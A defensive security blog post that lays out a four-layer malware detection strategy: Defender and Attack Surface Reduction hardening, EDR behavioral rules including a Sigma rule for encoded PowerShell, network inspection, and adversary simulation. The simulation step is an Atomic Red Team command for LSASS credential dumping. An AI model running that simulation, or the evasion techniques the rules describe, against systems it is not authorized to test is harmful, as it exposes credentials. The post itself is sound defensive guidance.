Antivirus and Malware Detection Strategy: Building a Defense-in-Depth Approach That Actually Works

Last year, I responded to an incident where a fileless PowerShell dropper bypassed three separate security products, lived in memory for eleven days, and exfiltrated 40GB of data before anyone noticed. The organization had antivirus—on every single endpoint. What they didn't have was a strategy. Here's how to build one that treats malware detection as an architecture problem, not a product purchase.

The Problem with "Install AV and Move On"

Legacy antivirus relies on signature databases—hashes and byte patterns of known malware. This works well against commodity threats but crumbles against polymorphic malware, living-off-the-land binaries (LOLBins), and zero-day payloads. Microsoft's own telemetry shows that adversaries increasingly abuse trusted tools like mshta.exe, certutil.exe, and rundll32.exe to execute malicious code without ever dropping a traditional executable to disk.

A mature detection strategy must operate across multiple layers: static analysis, behavioral detection, memory scanning, and network-level inspection.

Layer 1: Harden Your Endpoint Protection Platform (EPP)

Start with your existing antivirus—but configure it aggressively. Most EPP solutions ship with conservative defaults to avoid false positives. In an enterprise environment, you should tighten these.

For Microsoft Defender on Windows endpoints, enforce cloud-delivered protection and block-at-first-sight via Group Policy or Intune:

# Enable cloud-delivered protection and set cloud block level to High+
Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -CloudBlockLevel HighPlus
Set-MpPreference -CloudExtendedTimeout 50
Set-MpPreference -PUAProtection Enabled
Set-MpPreference -SubmitSamplesConsent SendAllSamples

Enable Attack Surface Reduction (ASR) rules to block common abuse vectors:

# Block Office apps from creating child processes
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

# Block credential stealing from LSASS
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled

Deploy these in audit mode first, review logs for two weeks, then enforce.

Layer 2: Behavioral Detection with EDR Telemetry

Endpoint Detection and Response (EDR) tools watch what processes do, not just what they look like. This is where you catch the fileless attacks that signature engines miss.

Key behavioral indicators to build detection rules around:

• Parent-child process anomalies: outlook.exe spawning powershell.exe is almost never legitimate.
• Suspicious command-line patterns: Base64-encoded PowerShell, download cradles, or AMSI bypass attempts.
• Unsigned binaries executing from %TEMP% or %APPDATA% directories.

A practical Sigma rule for detecting encoded PowerShell execution:

title: Suspicious Encoded PowerShell Command
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - 'FromBase64String'
  condition: selection
level: high

Feed these rules into your SIEM or EDR platform and tune from there.

Layer 3: Network-Level Inspection

Malware needs to communicate. Deploy DNS filtering to block known command-and-control domains and monitor for DNS over HTTPS (DoH) bypasses. Tools like Zeek or Suricata on network taps give you protocol-level visibility that endpoint agents can't provide.

At minimum, log and alert on connections to newly registered domains (NRDs)—domains less than 30 days old account for a disproportionate share of malicious infrastructure.

Layer 4: Continuous Validation

Detection strategies rot. Run regular tests using frameworks like MITRE ATT&CK and tools such as Atomic Red Team:

# Simulate a credential dumping technique (T1003.001)
Invoke-AtomicTest T1003.001 -TestNumbers 1

If your stack doesn't alert, you have a gap—document it, tune your rules, and test again.

Final Thought

Antivirus is a component, not a strategy. The organizations that consistently detect and contain malware treat detection engineering as an ongoing discipline: layered defenses, continuous tuning, and regular adversary simulation. Build the architecture, not just the checkbox.

Have questions about antivirus and malware detection strategy? I'm always happy to talk shop — reach out or connect with me on LinkedIn.